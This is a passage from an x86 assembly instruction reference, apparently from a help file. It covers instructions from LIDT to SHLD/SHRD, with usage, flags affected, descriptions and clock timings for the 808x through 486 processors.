286 386 486 Bytes + + mem64 - 11 11 11 5 + + + - see ~Instruction Timing~ + +:lidt +^LIDT - Load Interrupt Descriptor Table (286+ privileged) + + + Usage: LIDT src + Modifies flags: None + + + Loads a value from an operand into the Interrupt Descriptor Table + (IDT) register. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + mem64 - 12 11 11 5 + + + - see ~Instruction Timing~ + +:lgs +^LGS - Load Pointer Using GS (386+ only) + + + Usage: LGS dest,src + Modifies flags: None + + + Loads 32-bit pointer from memory source to destination register + and GS. The offset is placed in the destination register and the + segment is placed in GS. To use this instruction the word at the + lower memory address must contain the offset and the word at the + higher address must contain the segment. This simplifies the loading + of far pointers from the stack and the interrupt vector table. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,mem - - 7 6 5-7 + reg,mem (PM) - - 22 12 5-7 + + + - see ~Instruction Timing~ + +:lldt +^LLDT - Load Local Descriptor Table (286+ privileged) + + + Usage: LLDT src + Modifies flags: None + + + Loads a value from an operand into the Local Descriptor Table + Register (LDTR). + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg16 - 17 20 11 3 + mem16 - 19 24 11 5 + + + - see ~Instruction Timing~ + +:lmsw +^LMSW - Load Machine Status Word (286+ privileged) + + + Usage: LMSW src + Modifies flags: None + + + Loads the Machine Status Word (~MSW~) from data found at "src" + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg16 - 3 10 13 3 + mem16 - 6 13 13 5 + + + - see ~Instruction Timing~ + +:lock +^LOCK - Lock Bus + + + Usage: LOCK + LOCK: (386+ prefix) + Modifies flags: None + + + This instruction is a prefix that causes the CPU assert bus lock + signal during the execution of the next instruction. Used to + avoid two processors from updating the same data location. The + 286 always asserts lock during an XCHG with memory operands. This + should only be used to lock the bus prior to ~XCHG~, ~MOV~, ~IN~ and + ~OUT~ instructions. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 2 0 0 1 1 + + + - see ~Instruction Timing~ + +:lods:lodsb:lodsw:lodsd +^LODS - Load String (Byte, Word or Double) + + + Usage: LODS src + LODSB + LODSW + LODSD (386+ only) + Modifies flags: None + + Transfers string element addressed by DS:SI (even if an operand is + supplied) to the accumulator. SI is incremented based on the size + of the operand or based on the instruction used. If the Direction + Flag is set SI is decremented, if the Direction Flag is clear SI + is incremented. Use with REP prefixes. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + src 12/16 5 5 5 1 + + + - see ~Instruction Timing~ + +:loop +^LOOP - Decrement CX and Loop if CX Not Zero + + + Usage: LOOP label + Modifies flags: None + + + Decrements CX by 1 and transfers control to "label" if CX is not + Zero. The "label" operand must be within -128 or 127 bytes of the + instruction following the loop instruction + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 18 8+m 11+m 6 2 + no jump 5 4 ? 2 + + + - see ~Instruction Timing~ + +:loope:loopz +^LOOPE/LOOPZ - Loop While Equal / Loop While Zero + + + Usage: LOOPE label + LOOPZ label + Modifies flags: None + + Decrements CX by 1 (without modifying the flags) and transfers + control to "label" if CX != 0 and the Zero Flag is set. The + "label" operand must be within -128 or 127 bytes of the instruction + following the loop instruction. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 18 8+m 11+m 9 2 + no jump 5 4 ? 6 + + + - see ~Instruction Timing~ + +:loopnz:loopne +^LOOPNZ/LOOPNE - Loop While Not Zero / Loop While Not Equal + + + Usage: LOOPNZ label + LOOPNE label + Modifies flags: None + + Decrements CX by 1 (without modifying the flags) and transfers + control to "label" if CX != 0 and the Zero Flag is clear. The + "label" operand must be within -128 or 127 bytes of the instruction + following the loop instruction. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + label: jump 19 8+m 11+m 9 2 + no jump 5 4 ? 6 + + + - see ~Instruction Timing~ + +:lsl +^LSL - Load Segment Limit (286+ protected) + + + Usage: LSL dest,src + Modifies flags: ZF + + Loads the segment limit of a selector into the destination register + if the selector is valid and visible at the current privilege level. + If loading is successful the Zero Flag is set, otherwise it is + cleared. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg16,reg16 - 14 20/25 10 3 + reg32,reg32 - - 20/25 10 3 + reg16,mem16 - 16 21/26 10 5 + reg32,mem32 - - 21/26 10 5 + + + - 386 times are listed "byte granular" / "page granular" + - see ~Instruction Timing~ +:lss +^LSS - Load Pointer Using SS (386+ only) + + + Usage: LSS dest,src + Modifies flags: None + + + Loads 32-bit pointer from memory source to destination register + and SS. The offset is placed in the destination register and the + segment is placed in SS. To use this instruction the word at the + lower memory address must contain the offset and the word at the + higher address must contain the segment. This simplifies the loading + of far pointers from the stack and the interrupt vector table. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,mem - - 7 6 5-7 + reg,mem (PM) - - 22 12 5-7 + + + - see ~Instruction Timing~ + +:ltr +^LTR - Load Task Register (286+ privileged) + + + Usage: LTR src + Modifies flags: None + + + Loads the current task register with the value specified in "src". + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg16 - 17 23 20 3 + mem16 - 19 27 20 5 + + + - see ~Instruction Timing~ + +:mov +^MOV - Move Byte or Word + + Usage: MOV dest,src + Modifies flags: None + + Copies byte or word from the source operand to the destination + operand. If the destination is SS interrupts are disabled except + on early buggy 808x CPUs. Some CPUs disable interrupts if the + destination is any of the segment registers + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,reg 2 2 2 1 2 + mem,reg 9+EA 3 2 1 2-4 (W88=13+EA) + reg,mem 8+EA 5 4 1 2-4 (W88=12+EA) + mem,immed 10+EA 3 2 1 3-6 (W88=14+EA) + reg,immed 4 2 2 1 2-3 + mem,accum 10 3 2 1 3 (W88=14) + accum,mem 10 5 4 1 3 (W88=14) + segreg,reg16 2 2 2 3 2 + segreg,mem16 8+EA 5 5 9 2-4 (W88=12+EA) + reg16,segreg 2 2 2 3 2 + mem16,segreg 9+EA 3 2 3 2-4 (W88=13+EA) + reg32,CR0/CR2/CR3 - - 6 4 + CR0,reg32 - - 10 16 + CR2,reg32 - - 4 4 3 + CR3,reg32 - - 5 4 3 + reg32,DR0/DR1/DR2/DR3 - 22 10 3 + reg32,DR6/DR7 - - 22 10 3 + DR0/DR1/DR2/DR3,reg32 - 22 11 3 + DR6/DR7,reg32 - - 16 11 3 + reg32,TR6/TR7 - - 12 4 3 + TR6/TR7,reg32 - - 12 4 3 + reg32,TR3 3 + TR3,reg32 6 + + - when the 386 special registers are used all operands are 32 bits + - see ~Instruction Timing~ + +:movs:movsb:movsw:movsd +^MOVS - Move String (Byte or Word) + + Usage: MOVS dest,src + MOVSB + MOVSW + MOVSD (386+ only) + Modifies flags: None + + + Copies data from addressed by DS:SI (even if operands are given) to + the location ES:DI destination and updates SI and DI based on the + size of the operand or instruction used. SI and DI are incremented + when the Direction Flag is cleared and decremented when the Direction + Flag is Set. Use with ~REP~ prefixes. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + dest,src 18 5 7 7 1 (W88=26) + + + - see ~Instruction Timing~ + +:movsx +^MOVSX - Move with Sign Extend (386+ only) + + + Usage: MOVSX dest,src + Modifies flags: None + + + Copies the value of the source operand to the destination register + with the sign extended. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,reg - - 3 3 3 + reg,mem - - 6 3 3-7 + + + - see ~Instruction Timing~ + +:movzx +^MOVZX - Move with Zero Extend (386+ only) + + + Usage: MOVZX dest,src + Modifies flags: None + + + Copies the value of the source operand to the destination register + with the zeroes extended. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,reg - - 3 3 3 + reg,mem - - 6 3 3-7 + + + - see ~Instruction Timing~ + +:mul +^MUL - Unsigned Multiply + + Usage: MUL src + Modifies flags: CF OF (AF,PF,SF,ZF undefined) + + Unsigned multiply of the accumulator by the source. If "src" is + a byte value, then AL is used as the other multiplicand and the + result is placed in AX. If "src" is a word value, then AX is + multiplied by "src" and DX:AX receives the result. If "src" is + a double word value, then EAX is multiplied by "src" and EDX:EAX + receives the result. The 386+ uses an early out algorithm which + makes multiplying any size value in EAX as fast as in the 8 or 16 + bit registers. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 70-77 13 9-14 13-18 2 + reg16 118-113 21 9-22 13-26 2 + reg32 - - 9-38 13-42 2-4 + mem8 (76-83)+EA 16 12-17 13-18 2-4 + mem16 (124-139)+EA 24 12-25 13-26 2-4 + mem32 - - 12-21 13-42 2-4 + + + - see ~Instruction Timing~ ~IMUL~ + +:neg +^NEG - Two's Complement Negation + + + Usage: NEG dest + Modifies flags: AF CF OF PF SF ZF + + + Subtracts the destination from 0 and saves the 2s complement of + "dest" back into "dest". + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg 3 2 2 1 2 + mem 16+EA 7 6 3 2-4 (W88=24+EA) + + + - see ~Instruction Timing~ + +:nop +^NOP - No Operation (90h) + + + Usage: NOP + Modifies flags: None + + + This is a do nothing instruction. It results in occupation of both + space and time and is most useful for patching code segments. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 3 3 3 1 1 + + + - see ~Instruction Timing~ + +:not +^NOT - One's Compliment Negation (Logical NOT) + + + Usage: NOT dest + Modifies flags: None + + Inverts the bits of the "dest" operand forming the 1s complement. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg 3 2 2 1 2 + mem 16+EA 7 6 3 2-4 (W88=24+EA) + + + - see ~Instruction Timing~ + +:or +^OR - Inclusive Logical OR + + Usage: OR dest,src + Modifies flags: CF OF PF SF ZF (AF undefined) + + Logical inclusive OR of the two operands returning the result in + the destination. Any bit set in either operand will be set in the + destination. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,reg 3 2 2 1 2 + mem,reg 16+EA 7 7 3 2-4 (W88=24+EA) + reg,mem 9+EA 7 6 2 2-4 (W88=13+EA) + reg,immed 4 3 2 1 3-4 + mem8,immed8 17+EA 7 7 3 3-6 + mem16,immed16 25+EA 7 7 3 3-6 + accum,immed 4 3 2 1 2-3 + + + - see ~Instruction Timing~ + +:out +^OUT - Output Data to Port + + + Usage: OUT port,accum + Modifies flags: None + + Transfers byte in AL,word in AX or dword in EAX to the specified + hardware port address. If the port number is in the range of 0-255 + it can be specified as an immediate. If greater than 255 then the + port number must be specified in DX. Since the PC only decodes 10 + bits of the port address, values over 1023 can only be decoded by + third party vendor equipment and also map to the port range 0-1023. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + immed8,accum 10/14 3 10 16 2 + immed8,accum (PM) - - 4/24 11/31/29 2 + DX,accum 8/12 3 11 16 1 + DX,accum (PM) - - 5/25 10/30/29 1 + + + - 386+ protected mode timings depend on privilege levels. + + first number is the timing when: CPL ó IOPL + second number is the timing when: CPL > IOPL + third number is the timing when: virtual mode on 486 processor + + - see ~Instruction Timing~ + +:outs:outsb:outsw:outsd +^OUTS - Output String to Port (80188+ only) + + + Usage: OUTS port,src + OUTSB + OUTSW + OUTSD (386+ only) + Modifies flags: None + + + Transfers a byte, word or doubleword from "src" to the hardware + port specified in DX. For instructions with no operands the "src" + is located at DS:SI and SI is incremented or decremented by the + size of the operand or the size dictated by the instruction format. + When the Direction Flag is set SI is decremented, when clear, SI is + incremented. If the port number is in the range of 0-255 it can + be specified as an immediate. If greater than 255 then the port + number must be specified in DX. Since the PC only decodes 10 bits + of the port address, values over 1023 can only be decoded by third + party vendor equipment and also map to the port range 0-1023. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + port,src - 5 14 17 1 + port,src (PM) - - 8/28 10/32/30 1 + + + - 386+ protected mode timings depend on privilege levels. + + first number is the timing when: CPL ó IOPL + second number is the timing when: CPL > IOPL + third number is the timing when: virtual mode on 486 processor + + - see ~Instruction Timing~ + +:pop +^POP - Pop Word off Stack + + + Usage: POP dest + Modifies flags: None + + + Transfers word at the current stack top (SS:SP) to the destination + then increments SP by two to point to the new stack top. CS is not + a valid destination. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg16 8 5 4 4 1 + reg32 4 - - 4 1 + segreg 8 5 7 3 1 + mem16 17+EA 5 5 6 2-4 + mem32 5 - - 6 2-4 + + + - see ~Instruction Timing~ + +:popa:popad +^POPA/POPAD - Pop All Registers onto Stack (80188+ only) + + + Usage: POPA + POPAD (386+ only) + Modifies flags: None + + + Pops the top 8 words off the stack into the 8 general purpose 16/32 + bit registers. Registers are popped in the following order: (E)DI, + (E)SI, (E)BP, (E)SP, (E)DX, (E)CX and (E)AX. The (E)SP value popped + from the stack is actually discarded. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none - 19 24 9 1 + + + - see ~Instruction Timing~ + +:popf:popfd +^POPF/POPFD - Pop Flags off Stack + + + Usage: POPF + POPFD (386+ only) + Modifies flags: all flags + + + Pops word/doubleword from stack into the Flags Register and then + increments SP by 2 (for POPF) or 4 (for POPFD). + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 8/12 5 5 9 1 (W88=12) + none (PM) - - 5 6 1 + + + - see ~Instruction Timing~ + +:push +^PUSH - Push Word onto Stack + + Usage: PUSH src + PUSH immed (80188+ only) + Modifies flags: None + + + Decrements SP by the size of the operand (two or four, byte values + are sign extended) and transfers one word from source to the stack + top (SS:SP). + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg16 11/15 3 2 1 1 + reg32 - - 2 1 1 + mem16 16+EA 5 5 4 2-4 (W88=24+EA) + mem32 - - 5 4 2-4 + segreg 10/14 3 2 3 1 + immed - 3 2 1 2-3 + + + - see ~Instruction Timing~ + +:pusha:pushad +^PUSHA/PUSHAD - Push All Registers onto Stack (80188+ only) + + + Usage: PUSHA + PUSHAD (386+ only) + Modifies flags: None + + + Pushes all general purpose registers onto the stack in the following + order: (E)AX, (E)CX, (E)DX, (E)BX, (E)SP, (E)BP, (E)SI, (E)DI. The + value of SP is the value before the actual push of SP. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none - 19 24 11 1 + + + - see ~Instruction Timing~ + +:pushf:pushfd +^PUSHF/PUSHFD - Push Flags onto Stack + + + Usage: PUSHF + PUSHFD (386+ only) + Modifies flags: None + + + Transfers the Flags Register onto the stack. PUSHF saves a 16 bit + value while PUSHFD saves a 32 bit value. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 10/14 3 4 4 1 + none (PM) - - 4 3 1 + + + - see ~Instruction Timing~ + +:rcl +^RCL - Rotate Through Carry Left + + Usage: RCL dest,count + Modifies flags: CF OF + + + Rotates the bits in the destination to the left "count" times with + all data pushed out the left side re-entering on the right. The + Carry Flag holds the last bit rotated out. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,1 2 2 9 3 2 + mem,1 15+EA 7 10 4 2-4 (W88=23+EA) + reg,CL 8+4n 5+n 9 8-30 2 + mem,CL 20+EA+4n 8+n 10 9-31 2-4 (W88=28+EA+4n) + reg,immed8 - 5+n 9 8-30 3 + mem,immed8 - 8+n 10 9-31 3-5 + + + - see ~Instruction Timing~ + +:rcr +^RCR - Rotate Through Carry Right + + Usage: RCR dest,count + Modifies flags: CF OF + + + Rotates the bits in the destination to the right "count" times with + all data pushed out the right side re-entering on the left. The + Carry Flag holds the last bit rotated out. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,1 2 2 9 3 2 + mem,1 15+EA 7 10 4 2-4 (W88=23+EA) + reg,CL 8+4n 5+n 9 8-30 2 + mem,CL 20+EA+4n 8+n 10 9-31 2-4 (W88=28+EA+4n) + reg,immed8 - 5+n 9 8-30 3 + mem,immed8 - 8+n 10 9-31 3-5 + + + - see ~Instruction Timing~ + +:rep +^REP - Repeat String Operation + + Usage: REP + Modifies flags: None + + Repeats execution of string instructions while CX != 0. After + each string operation, CX is decremented and the Zero Flag is + tested. The combination of a repeat prefix and a segment override + on CPU's before the 386 may result in errors if an interrupt occurs + before CX=0. The following code shows code that is susceptible to + this and how to avoid it: + + again: rep movs byte ptr ES:[DI],ES:[SI] ; vulnerable instr. + jcxz next ; continue if REP successful + loop again ; interrupt goofed count + next: + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 2 2 2 1 + + + - see ~Instruction Timing~ ~REPE~ ~REPNE~ +:repe:repz +^REPE/REPZ - Repeat Equal / Repeat Zero + + + Usage: REPE + REPZ + Modifies flags: None + + + Repeats execution of string instructions while CX != 0 and the Zero + Flag is set. CX is decremented and the Zero Flag tested after + each string operation. The combination of a repeat prefix and a + segment override on processors other than the 386 may result in + errors if an interrupt occurs before CX=0. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 2 2 2 1 + + + - see ~Instruction Timing~ + +:repne:repnz +^REPNE/REPNZ - Repeat Not Equal / Repeat Not Zero + + + Usage: REPNE + REPNZ + Modifies flags: None + + + Repeats execution of string instructions while CX != 0 and the Zero + Flag is clear. CX is decremented and the Zero Flag tested after + each string operation. The combination of a repeat prefix and a + segment override on processors other than the 386 may result in + errors if an interrupt occurs before CX=0. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 2 2 2 1 + + + - see ~Instruction Timing~ + +:ret:retf:retn +^RET/RETF - Return From Procedure + + Usage: RET nBytes + RETF nBytes + RETN nBytes + Modifies flags: None + + Transfers control from a procedure back to the instruction address + saved on the stack. "n bytes" is an optional number of bytes to + release. Far returns pop the IP followed by the CS, while near + returns pop only the IP register. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + retn 16/20 11+m 10+m 5 1 + retn immed 20/24 11+m 10+m 5 3 + retf 26/34 15+m 18+m 13 1 + retf (PM, same priv.) - 32+m 18 1 + retf (PM, lesser priv.) - 68 33 1 + retf immed 25/33 15+m 18+m 14 3 + retf immed (PM, same priv.) 32+m 17 1 + retf immed (PM, lesser priv.) 68 33 1 + + + - see ~Instruction Timing~ + +:rol +^ROL - Rotate Left + + Usage: ROL dest,count + Modifies flags: CF OF + + + Rotates the bits in the destination to the left "count" times with + all data pushed out the left side re-entering on the right. The + Carry Flag will contain the value of the last bit rotated out. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,1 2 2 3 3 2 + mem,1 15+EA 7 7 4 2-4 (W88=23+EA) + reg,CL 8+4n 5+n 3 3 2 + mem,CL 20+EA+4n 8+n 7 4 2-4 (W88=28+EA+4n) + reg,immed8 - 5+n 3 2 3 + mem,immed8 - 8+n 7 4 3-5 + + + - see ~Instruction Timing~ + +:ror +^ROR - Rotate Right + + Usage: ROR dest,count + Modifies flags: CF OF + + + Rotates the bits in the destination to the right "count" times with + all data pushed out the right side re-entering on the left. The + Carry Flag will contain the value of the last bit rotated out. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,1 2 2 3 3 2 + mem,1 15+EA 7 7 4 2-4 (W88=23+EA) + reg,CL 8+4n 5+n 3 3 2 + mem,CL 20+EA+4n 8+n 7 4 2-4 (W88=28+EA+4n) + reg,immed8 - 5+n 3 2 3 + mem,immed8 - 8+n 7 4 3-5 + + + - see ~Instruction Timing~ + +:sahf +^SAHF - Store AH Register into FLAGS + + + Usage: SAHF + Modifies flags: AF CF PF SF ZF + + + Transfers bits 0-7 of AH into the Flags Register. This includes + AF, CF, PF, SF and ZF. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 4 2 3 2 1 + + + - see ~Instruction Timing~ + +:sal:shl +^SAL/SHL - Shift Arithmetic Left / Shift Logical Left + + Usage: SAL dest,count + SHL dest,count + Modifies flags: CF OF PF SF ZF (AF undefined) + + + Shifts the destination left by "count" bits with zeroes shifted + in on right. The Carry Flag contains the last bit shifted out. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,1 2 2 3 3 2 + mem,1 15+EA 7 7 4 2-4 (W88=23+EA) + reg,CL 8+4n 5+n 3 3 2 + mem,CL 20+EA+4n 8+n 7 4 2-4 (W88=28+EA+4n) + reg,immed8 - 5+n 3 2 3 + mem,immed8 - 8+n 7 4 3-5 + + + - see ~Instruction Timing~ + +:sar +^SAR - Shift Arithmetic Right + + Usage: SAR dest,count + Modifies flags: CF OF PF SF ZF (AF undefined) + + + Shifts the destination right by "count" bits with the current sign + bit replicated in the leftmost bit. The Carry Flag contains the + last bit shifted out. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,1 2 2 3 3 2 + mem,1 15+EA 7 7 4 2-4 (W88=23+EA) + reg,CL 8+4n 5+n 3 3 2 + mem,CL 20+EA+4n 8+n 7 4 2-4 (W88=28+EA+4n) + reg,immed8 - 5+n 3 2 3 + mem,immed8 - 8+n 7 4 3-5 + + + - see ~Instruction Timing~ + +:sbb +^SBB - Subtract with Borrow + + Usage: SBB dest,src + Modifies flags: AF CF OF PF SF ZF + + + Subtracts the source from the destination, and subtracts 1 extra if + the Carry Flag is set. Results are returned in "dest". + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,reg 3 2 2 1 2 + mem,reg 16+EA 7 6 3 2-4 (W88=24+EA) + reg,mem 9+EA 7 7 2 2-4 (W88=13+EA) + reg,immed 4 3 2 1 3-4 + mem,immed 17+EA 7 7 3 3-6 (W88=25+EA) + accum,immed 4 3 2 1 2-3 + + + - see ~Instruction Timing~ + +:scas:scasb:scasw:scasd +^SCAS - Scan String (Byte, Word or Doubleword) + + + Usage: SCAS string + SCASB + SCASW + SCASD (386+ only) + Modifies flags: AF CF OF PF SF ZF + + + Compares value at ES:DI (even if operand is specified) from the + accumulator and sets the flags similar to a subtraction. DI is + incremented/decremented based on the instruction format (or + operand size) and the state of the Direction Flag. Use with REP + prefixes. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + string 15 7 7 6 1 (W88=19) + + + - see ~Instruction Timing~ + +:setae:setnb +^SETAE/SETNB - Set if Above or Equal / Set if Not Below +^(unsigned, 386+ only) + + + Usage: SETAE dest + SETNB dest + Modifies flags: none + + + Sets the byte in the operand to 1 if the Carry Flag is clear + otherwise sets the operand to 0. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 - - 4 3 3 + mem8 - - 5 4 3 + + + - see ~Instruction Timing~ + +:setb:setnae +^SETB/SETNAE - Set if Below / Set if Not Above or Equal +^(unsigned, 386+ only) + + + Usage: SETB dest + SETNAE dest + Modifies flags: none + + + Sets the byte in the operand to 1 if the Carry Flag is set + otherwise sets the operand to 0. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 - - 4 3 3 + mem8 - - 5 4 3 + + + - see ~Instruction Timing~ + +:setbe:setna +^SETBE/SETNA - Set if Below or Equal / Set if Not Above +^(unsigned, 386+ only) + + + Usage: SETBE dest + SETNA dest + Modifies flags: none + + + Sets the byte in the operand to 1 if the Carry Flag or the Zero + Flag is set, otherwise sets the operand to 0. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 - - 4 3 3 + mem8 - - 5 4 3 + + + - see ~Instruction Timing~ + +:sete:setz +^SETE/SETZ - Set if Equal / Set if Zero (386+ only) + + + Usage: SETE dest + SETZ dest + Modifies flags: none + + + Sets the byte in the operand to 1 if the Zero Flag is set, + otherwise sets the operand to 0. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 - - 4 3 3 + mem8 - - 5 4 3 + + + - see ~Instruction Timing~ + +:setne:setnz +^SETNE/SETNZ - Set if Not Equal / Set if Not Zero (386+ only) + + + Usage: SETNE dest + SETNZ dest + Modifies flags: none + + + Sets the byte in the operand to 1 if the Zero Flag is clear, + otherwise sets the operand to 0. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 - - 4 3 3 + mem8 - - 5 4 3 + + + - see ~Instruction Timing~ + +:setl:setnge +^SETL/SETNGE - Set if Less / Set if Not Greater or Equal +^(signed, 386+ only) + + + Usage: SETL dest + SETNGE dest + Modifies flags: none + + + Sets the byte in the operand to 1 if the Sign Flag is not equal + to the Overflow Flag, otherwise sets the operand to 0. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 - - 4 3 3 + mem8 - - 5 4 3 + + + - see ~Instruction Timing~ + +:setge:setnl +^SETGE/SETNL - Set if Greater or Equal / Set if Not Less +^(signed, 386+ only) + + + Usage: SETGE dest + SETNL dest + Modifies flags: none + + + Sets the byte in the operand to 1 if the Sign Flag equals the + Overflow Flag, otherwise sets the operand to 0. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 - - 4 3 3 + mem8 - - 5 4 3 + + + - see ~Instruction Timing~ + +:setle:setng +^SETLE/SETNG - Set if Less or Equal / Set if Not greater or Equal +^(signed, 386+ only) + + + Usage: SETLE dest + SETNG dest + Modifies flags: none + + + Sets the byte in the operand to 1 if the Zero Flag is set or the + Sign Flag is not equal to the Overflow Flag, otherwise sets the + operand to 0. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 - - 4 3 3 + mem8 - - 5 4 3 + + + - see ~Instruction Timing~ + +:setg:setnle +^SETG/SETNLE - Set if Greater / Set if Not Less or Equal +^(signed, 386+ only) + + + Usage: SETG dest + SETNLE dest + Modifies flags: none + + + Sets the byte in the operand to 1 if the Zero Flag is clear or the + Sign Flag equals to the Overflow Flag, otherwise sets the operand + to 0. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 - - 4 3 3 + mem8 - - 5 4 3 + + + - see ~Instruction Timing~ + +:sets +^SETS - Set if Signed (386+ only) + + + Usage: SETS dest + Modifies flags: none + + + Sets the byte in the operand to 1 if the Sign Flag is set, otherwise + sets the operand to 0. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 - - 4 3 3 + mem8 - - 5 4 3 + + + - see ~Instruction Timing~ + +:setns +^SETNS - Set if Not Signed (386+ only) + + + Usage: SETNS dest + Modifies flags: none + + + Sets the byte in the operand to 1 if the Sign Flag is clear, + otherwise sets the operand to 0. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 - - 4 3 3 + mem8 - - 5 4 3 + + + - see ~Instruction Timing~ + +:setc +^SETC - Set if Carry (386+ only) + + + Usage: SETC dest + Modifies flags: none + + + Sets the byte in the operand to 1 if the Carry Flag is set, + otherwise sets the operand to 0. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 - - 4 3 3 + mem8 - - 5 4 3 + + + - see ~Instruction Timing~ + +:setnc +^SETNC - Set if Not Carry (386+ only) + + + Usage: SETNC dest + Modifies flags: none + + + Sets the byte in the operand to 1 if the Carry Flag is clear, + otherwise sets the operand to 0. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 - - 4 3 3 + mem8 - - 5 4 3 + + + - see ~Instruction Timing~ + +:seto +^SETO - Set if Overflow (386+ only) + + + Usage: SETO dest + Modifies flags: none + + + Sets the byte in the operand to 1 if the Overflow Flag is set, + otherwise sets the operand to 0. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 - - 4 3 3 + mem8 - - 5 4 3 + + + - see ~Instruction Timing~ + +:setno +^SETNO - Set if Not Overflow (386+ only) + + + Usage: SETNO dest + Modifies flags: none + + + Sets the byte in the operand to 1 if the Overflow Flag is clear, + otherwise sets the operand to 0. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 - - 4 3 3 + mem8 - - 5 4 3 + + + - see ~Instruction Timing~ + +:setp:setpe +^SETP/SETPE - Set if Parity / Set if Parity Even (386+ only) + + + Usage: SETP dest + SETPE dest + Modifies flags: none + + + Sets the byte in the operand to 1 if the Parity Flag is set, + otherwise sets the operand to 0. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 - - 4 3 3 + mem8 - - 5 4 3 + + + - see ~Instruction Timing~ + +:setnp:setpo +^SETNP/SETPO - Set if No Parity / Set if Parity Odd (386+ only) + + + Usage: SETNP dest + SETPO dest + Modifies flags: none + + + Sets the byte in the operand to 1 if the Parity Flag is clear, + otherwise sets the operand to 0. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg8 - - 4 3 3 + mem8 - - 5 4 3 + + + - see ~Instruction Timing~ + +:sgdt +^SGDT - Store Global Descriptor Table (286+ privileged) + + + Usage: SGDT dest + Modifies flags: none + + + Stores the Global Descriptor Table (~GDT~) Register into the + specified operand. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + mem64 - 11 9 10 5 + + + - see ~Instruction Timing~ + +:sidt +^SIDT - Store Interrupt Descriptor Table (286+ privileged) + + + Usage: SIDT dest + Modifies flags: none + + + Stores the Interrupt Descriptor Table (IDT) Register into the + specified operand. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + mem64 - 12 9 10 5 + + + - see ~Instruction Timing~ + +:shr +^SHR - Shift Logical Right + + Usage: SHR dest,count + Modifies flags: CF OF PF SF ZF (AF undefined) + + + Shifts the destination right by "count" bits with zeroes shifted + in on the left. The Carry Flag contains the last bit shifted out. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,1 2 2 3 2 + mem,1 15+EA 7 7 2-4 (W88=23+EA) + reg,CL 8+4n 5+n 3 2 + mem,CL 20+EA+4n 8+n 7 2-4 (W88=28+EA+4n) + reg,immed8 - 5+n 3 3 + mem,immed8 - 8+n 7 3-5 + + + - see ~Instruction Timing~ + +:shld:shrd +^SHLD/SHRD - Double Precision Shift (386+ only) + + + Usage: SHLD dest,src,count + SHRD dest,src,count + Modifies flags: CF PF SF ZF (OF,AF undefined) + + + SHLD shifts "dest" to the left "count" times and the bit positions + opened are filled with the most significant bits of "src". SHRD + shifts "dest" to the right "count" times and the bit positions + opened are filled with the least significant bits of the second + operand. Only the 5 lower bits of "count" are used. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg16,reg16,immed8 - - 3 2 4 + reg32,reg32,immed8 - - 3 2 4 + mem16,reg16,immed8 - - 7 3 6 + mem32,reg32,immed8 - - 7 3 6 + 